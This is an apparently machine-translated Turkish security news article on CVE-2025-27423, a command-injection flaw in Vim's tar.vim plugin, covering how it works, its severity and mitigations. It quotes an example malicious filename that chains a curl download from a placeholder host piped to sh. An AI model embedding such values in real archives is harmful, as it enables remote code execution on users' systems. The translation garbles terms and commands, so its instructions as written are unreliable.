VIM Metin Düzenleyici Güvenlik Açığı CVE-2025-27423, kötü niyetli katran arşivleri aracılığıyla keyfi kod yürütülmesine izin veren yüksek şiddetli bir sorundur.
9.1.1164’ten önce VIM sürümlerini etkileyen, paketlenmiş Tar.vim eklentisindeki bu kusur, kullanıcıları özel hazırlanmış katran dosyalarını kullanırken potansiyel komut enjeksiyon saldırılarına maruz bırakır.
Mart 2025’te yamalanan güvenlik açığı, dosya işleme iş akışlarında kritik giriş doğrulama hatalarının altını çiziyor.
Saldırı mekanizması
2004 yılından bu yana standart VIM dağıtımlarına dahil olan Tar.vim eklentisi, kullanıcıların manuel çıkarma olmadan katran arşivleri içindeki dosyaları doğrudan düzenlemelerini sağlar.
Bir Kasım 2024 güncellemesi (taahhüt 129A844) gelişmiş dosya izni işleme tanıttı, ancak yanlışlıkla bir enjeksiyon vektörü oluşturdu.
Eklentinin Değiştirilmiş: Okuma Komutu Uygulaması, arşiv meta verilerinden çıkarılan dosya adlarını sterilize edemedi ve saldırganların kabuk metacharacters’ı;, |, veya && dosya adlarına yerleştirmesine izin verdi.
Bir kullanıcı silahlı bir katran dosyası açtığında, Tar.vim, tasarlanmamış dosya adı verilerini kullanarak bir sistem komut dizesi oluşturur.
Örneğin, yasal_file.txt gibi bir dosya adı; kıvrılmak [http://malicious.site/payload.sh] | SH, yük yürütme komutunu VIM’lere: Boru Hattı’nı okuyun.
Yürütme, kullanıcının yapılandırılmış kabuğundan (Vim’in $ kabuk için varsayılan olarak kabuk seçeneği ile tanımlanır) ile gerçekleşir, yani saldırı başarısı komut zincirleme gibi kabuk özelliklerine bağlıdır.
Yüksek şiddet (CVSSV4: 8.1) olarak derecelendirilmiş CVE-2025-27423, özellikle VIM’de kötü niyetli bir arşiv açan kullanıcı etkileşimi gerektirir.
Görünür dosya adı anomalileri (örneğin, dosya adlarındaki noktalı virgüller) temkinli kullanıcıları uyarabilirken, sofistike saldırılar yükleri gizleyebilir.
Güvenlik açığının etkisi bireysel iş istasyonlarının ötesine uzanır. Log muayene, CI/CD boru hatları ayrıştırma artefaktları veya otomatik Vimdiff arşiv karşılaştırmalarına sahip sistemler için VIM kullanan geliştirme ortamları yüksek risklerle karşı karşıyadır.
GMO Flatt Güvenlik Analisti @RY0TAK, kusuru keşfetmekle kredilendirildi.
Hafifletme
VIM projesi, Regex tabanlı filtreleme kullanarak sağlam dosya adı sanitizasyon ile 9.1.1164 sürümünü yayınladı. Anında eylemler şunları içerir:
- Resmi paket yöneticilerini kullanarak VIM’i yükselt (APT Upgrade Vim, Brew Update Vim)
- VIM ile Kurulumu Doğrulun – Sürüm | Grep 9.1.1164
- Patalanmamış sistemler için:
TAR.VIM’i echo ‘ile devre dışı bırak’ G: loaded_tar = 1 ‘>> ~/.vimrc
Kabuk yeteneklerini geçici olarak sınırlamak için kabuk =/bin/çizgiyi ayarlayın.
VIM kullanıcıları güncellemelere öncelik vermeli ve üçüncü taraf eklentileri, özellikle de güvenilmeyen dosya biçimlerini işleyenleri denetlemelidir. Tedarik zinciri saldırıları giderek daha karmaşıklaştıkça, vim içi arşiv erişiminin editoryal rahatlığı artık artan inceleme gerektiriyor.
Büyük AV motorları artık kötü niyetli katran desenlerini tespit etmesine rağmen, Github’da kavram kanıtı istismarları ortaya çıktığından, devam eden izleme önerilmektedir.
Sistem yöneticileri, şüpheli arşiv içeriğini bu tehdidin sosyal mühendislik yönlerini azaltmada kritik çok katmanlı bir savunma tanınması için yamayı kullanıcı eğitimi ile birleştirmelidir.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free